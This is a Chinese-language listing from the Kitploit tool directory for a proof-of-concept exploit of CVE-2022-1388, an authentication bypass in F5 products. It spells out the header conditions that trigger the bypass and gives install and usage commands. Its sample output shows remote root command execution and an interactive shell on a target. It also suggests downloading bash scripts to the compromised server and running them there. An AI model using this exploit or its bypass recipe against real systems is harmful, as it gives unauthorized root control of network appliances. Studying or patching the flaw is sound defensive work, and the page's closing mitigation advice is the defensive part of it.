Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-1388-POC — 针对CVE-2022-1388的改进型概念验证,附带交互式Shell | Kitploit
工具/GitHubGitHub/psychosec2/cve-2022-1388-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队远程访问工具
GitHubpsychosec2/cve-2022-1388-poc

CVE-2022-1388-POC

针对CVE-2022-1388的改进型概念验证,附带交互式Shell

查看仓库
14411年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-1388 PoC by PsychoSec

针对影响多个 F5 产品的 CVE-2022-1388 的改进版 PoC。

这是 Horizon3 的 CVE-2022-1388 概念验证的改进版本: https://github.com/horizon3ai/CVE-2022-1388

此版本包含多项改进以及一个用于运行远程命令的交互式 shell。

技术分析:

Horizon3 对该漏洞的技术根源分析可在其博客中找到: https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/

摘要:

利用该漏洞的请求所需条件:

  1. Connection 标头必须包含 X-F5-Auth-Token
  2. 必须存在 X-F5-Auth-Token 标头
  3. Host 标头必须是 localhost / 127.0.0.1,或者 Connection 标头必须包含 X-Forwarded-Host
  4. Auth 标头必须设置为 admin 用户名和任意密码

依赖项:

  • git
  • pip3
  • python3

安装:

root@kitploit:~
git clone https://github.com/PsychoSec2/CVE-2022-1388-POC.git
cd ./CVE-2022-1388-POC
pip3 install -r requirements.txt
python3 ./CVE-2022-1388.py -h

使用方法:

测试目标:

root@kitploit:~
root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -u https://192.168.0.221 -t
Running test on target: https://192.168.0.221 | Command: whoami
Response: root
Target is vulnerable!!

Use -s option to run an interactive shell.

交互式 Shell:

root@kitploit:~
root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -u https://192.168.0.221 -s
Running interactive shell..

root@f5-localhost: /var/service/restjavad$ 

不需要使用任何反向 TCP 连接或监听器。

选项:

root@kitploit:~
root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -h
Usage: CVE-2022-1388.py [options]

Options:
  -h, --help         Show this help message.
  -u URL, --url=URL  The IP address of the target.
  -t, --test         Test target for CVE-2022-1388.
  -s, --shell        Run an interactive shell.

重要说明:

请注意,在未修补的系统上运行交互式 shell 时,某些命令和语法可能无法正常运行或给出预期结果。这可能是由于服务器 API 请求和响应中使用了 JSON。为避免问题,请尽量不在交互式 shell 中使用 JSON 语法中常见的单个字符,例如冒号、逗号、花括号、方括号,尤其是引号。命令中的任何 JSON 语法都应按照格式构建。

在命令中使用任何非结构化 JSON 语法都可能导致向服务器发送格式错误的 API 请求,并可能导致:无命令输出、命令未执行、或完全退出 Python 脚本。这不幸地使某些命令无法使用。要解决此问题,您可以改为编写 bash 脚本,将其下载到服务器,然后使用交互式 shell 执行。此外,也无法使用 'cd' 命令切换目录。

  • JSON 简介:https://javaee.github.io/tutorial/jsonp001.html

无论如何,您应该仍然能够获得基本命令输出。如果没有命令输出,并不意味着命令未执行。但您需要自行分析才能确定。

缓解措施:

更新到最新版本,或按照 F5 安全公告中的说明进行缓解:

  • https://support.f5.com/csp/article/K23605346

免责声明:

本软件纯粹出于学术研究和开发有效防御技术的目的而创建,除非明确授权,否则不应用于攻击系统。项目维护者不对软件的滥用负责。请负责任地使用。

下载工具